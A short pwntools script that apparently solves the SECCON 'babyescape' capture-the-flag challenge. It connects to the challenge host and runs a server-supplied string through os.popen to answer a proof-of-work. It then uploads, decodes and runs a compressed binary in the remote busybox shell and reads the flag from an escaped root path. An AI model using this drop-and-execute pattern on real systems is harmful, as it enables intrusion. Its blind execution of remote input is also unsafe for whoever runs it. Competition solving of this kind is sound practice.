from pwn import *
import os
rr = remote('babyescape.int.seccon.games', 9999)
x = rr.recvline().strip().decode()
print('shell check')
input(x)
print('pow')
ans = os.popen(x).read()
rr.sendlineafter(b'hashcash token:', ans.encode())
print('done')
rr.sendlineafter(b'/ # ', b'/bin/busybox mkdir /mnt')
print('sending')
rr.sendlineafter(b'/ # ', b'echo ' + open('b.txt', 'rb').read() + b' > b.txt')
print('done')
rr.sendlineafter(b'/ # ', b'/bin/busybox base64 -d b.txt | /bin/busybox xz -d > test')
rr.sendlineafter(b'/ # ', b'/bin/busybox chmod +x /test')
rr.sendlineafter(b'/ # ', b'./test')
rr.sendlineafter(b'/ # ', b'/bin/busybox cat /mnt/1/root/root/flag.txt')
rr.interactive()